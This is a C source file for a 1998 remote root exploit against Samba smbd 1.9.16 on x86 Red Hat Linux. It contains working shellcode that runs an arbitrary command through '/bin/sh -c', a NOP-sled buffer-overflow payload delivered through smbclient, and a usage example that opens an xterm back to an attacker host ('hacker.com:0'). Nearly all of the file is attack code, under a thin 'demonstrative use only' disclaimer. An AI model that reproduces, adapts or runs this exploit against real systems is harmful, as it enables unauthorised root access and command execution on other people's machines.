/*

	Smbd exploit code for x86 linux

	Remote user can gain root access.

	Tested redhat linux : 4.0 , 4.1 , 4.2
	Tested smbd version : 1.9.16p2 , 1.9.16p11

	What requires
	smbclient that can send long password.

	Usage
	$ smbd-ex <hostname> <netbios name> <command> [offset]

	This program is only for demonstrative use only.
	USE IT AT YOUR OWN RISK!

	Programmed by Taeho Oh 1998/10/15

Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug

*/

#include<stdio.h>
#include<stdlib.h>

#define OFFSET                            0
#define RET_POSITION                   3060
#define RANGE                            20
#define NOP                            0x90

char shellcode[400]=
	"\xeb\x35"                      /* jmp 0x35             */
	"\x5e"                          /* popl %esi            */
	"\x89\x76\x0b"                  /* movl %esi,0xb(%esi)  */
	"\x89\xf0"                      /* movl %esi,%eax       */
	"\x83\xc0\x08"                  /* addl $0x8,%eax       */
	"\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
	"\x89\xf0"                      /* movl %esi,%eax       */
	"\x83\xc0\x0b"                  /* addl $0xb,%eax       */
	"\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
	"\x31\xc0"                      /* xorl %eax,%eax       */
	"\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
	"\x88\x46\x0a"                  /* movb %eax,0xa(%esi)  */
	"\x88\x46\x0b"                  /* movb %eax,0xb(%esi)  */
	"\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
	"\xb0\x0b"                      /* movb $0xb,%al        */
	"\x89\xf3"                      /* movl %esi,%ebx       */
	"\x8d\x4e\x0b"                  /* leal 0xb(%esi),%ecx  */
	"\x8d\x56\x0b"                  /* leal 0xb(%esi),%edx  */
	"\xcd\x80"                      /* int 0x80             */
	"\x31\xdb"                      /* xorl %ebx,%ebx       */
	"\x89\xd8"                      /* movl %ebx,%eax       */
	"\x40"                          /* inc %eax             */
	"\xcd\x80"                      /* int 0x80             */
	"\xe8\xc6\xff\xff\xff"          /* call -0x3a           */
	"/bin/sh -c ";                  /* .string "/bin/sh -c "*/
char command[400];

void usage()
{
	printf("Usage: smbd-ex <hostname> <netbios name> <command> [offset]\n");
	printf("ex) smbd-ex ohhara.target.com OHHARA \"/usr/X11R6/bin/xterm -display hacker.com:0\"\n");
}

void main(int argc,char **argv)
{
	char buffer[256];
	char ip[256];
	char buff[RET_POSITION+RANGE+1],*ptr;
	long *addr_ptr,addr;
	unsigned long sp;
	int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
	int i;

	printf("Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara\n");
	printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n");
	printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n");

	if(argc<4)
	{
		usage();
		exit(1);
	}

	if(argc>3)
	{
		strcpy(ip,argv[1]);
		sprintf(buffer,"\\\\\\\\%s\\\\IPC$",argv[2]);
		strcpy(command,argv[3]);
	}
	if(argc>4)
		offset=atoi(argv[4]);

	shellcode[5]=(shellcode[5]+strlen(command))/4*4+4;
	shellcode[13]=(shellcode[13]+strlen(command))/4*4+8;
	shellcode[21]=(shellcode[21]+strlen(command))/4*4+12;
	shellcode[32]=(shellcode[32]+strlen(command));
	shellcode[35]=(shellcode[35]+strlen(command))/4*4+16;
	shellcode[42]=(shellcode[42]+strlen(command))/4*4+4;
	shellcode[45]=(shellcode[45]+strlen(command))/4*4+16;
	strcat(shellcode,command);

	sp=0xbffffb11;
	addr=sp-offset;

	ptr=buff;
	addr_ptr=(long*)ptr;
	for(i=0;i<bsize;i+=4)
		*(addr_ptr++)=addr;

	for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
		buff[i]=NOP;

	ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
	for(i=0;i<strlen(shellcode);i++)
		*(ptr++)=shellcode[i];

	buff[bsize-1]='\0';

	execl("./smbclient","smbclient",buffer,buff,"-I",ip,NULL);
}